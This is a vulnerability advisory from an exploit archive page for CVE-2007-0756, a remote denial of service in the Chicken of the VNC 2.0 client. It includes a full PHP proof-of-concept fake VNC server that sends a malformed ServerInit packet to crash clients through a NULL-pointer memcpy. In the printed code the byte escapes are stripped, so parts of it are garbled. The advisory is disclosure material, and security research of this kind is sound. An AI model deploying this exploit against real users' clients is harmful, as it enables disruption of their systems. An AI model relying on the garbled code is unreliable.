Chicken of the VNC 2.0 remote DoS

2007.02.07
Credit: poplix
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2007-0756
CWE: CWE-Other


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

hi, i wish to inform you that cotv 2.0 (a vnc client for maxosx) available at http://sourceforge.net/projects/cotvnc/ is prone to a remotely exploitable denial of service vulnerability because it fails to validate the content of ServerInit packets. A ServerInit packet contains the server's computer name and its size in the following format: [...]<computer-name-size><computer-name> where: computer-name-size is 4bytes interpreted as unsigned int rapresentig the size in bytes of the computer name and computer-name is a variable size array of bytes rapresentig the computer name when cotv recives a ServerInit packet, it first allocates a buffer by passing computer-name-size to malloc() and then it copies computer-name to the newly allocated memory. The problem is that cotv doesn't validate the pointer returned by malloc() so it's possible that a NULL-pointer will be used as the first parameter of memcpy() causing the program to crash. a proof-of-concept is attached, run that php script and connect cotv to it with a blank password (disable vnc auth) hope it helps, cheers -poplix # BOF <? $port = "5900"; $BadServerInit= "x04x00". // fb-width "x03x00". // fb-hight "x20". // bits per pixel "x18". // depth "x00". // big-endian flag "x01". // true-color flag "x00xffx00xffx00xff". // r-g-b max "x10x08x00". // r-g-b shift "x00x00x00". // padding "xffxffxffxff". // computer-name size "DIE_PLZ"; // computer-name $ser = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); socket_set_option($ser,SOL_SOCKET,SO_REUSEADDR,1); socket_bind($ser,"0.0.0.0", $port); socket_listen($ser, 5); print "this fake vnc server will crash cotv2.0 (http://sourceforge.net/projects/cotvnc/) due to a NULL-pointer dereference 02-02-2007 poplix [@] papuasia.org listening on $port ...n"; $cotv = socket_accept($ser); print "client connectedn"; socket_write($cotv, "RFB 00 3.008n"); while($i=socket_read($cotv, 1024)) if(substr($i,0,6) == "RFB 00") break; print "protocol has been negotiatedn"; socket_write($cotv, "x00x00x00x01"); while($i=socket_read($cotv, 1024)) if(ord($i[0])==0 || ord($i[0])==1)break; print "sending expl...n"; socket_write($cotv, $BadServerInit); socket_close($cotv); socket_close($ser); print "donen"; ?> # EOF


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top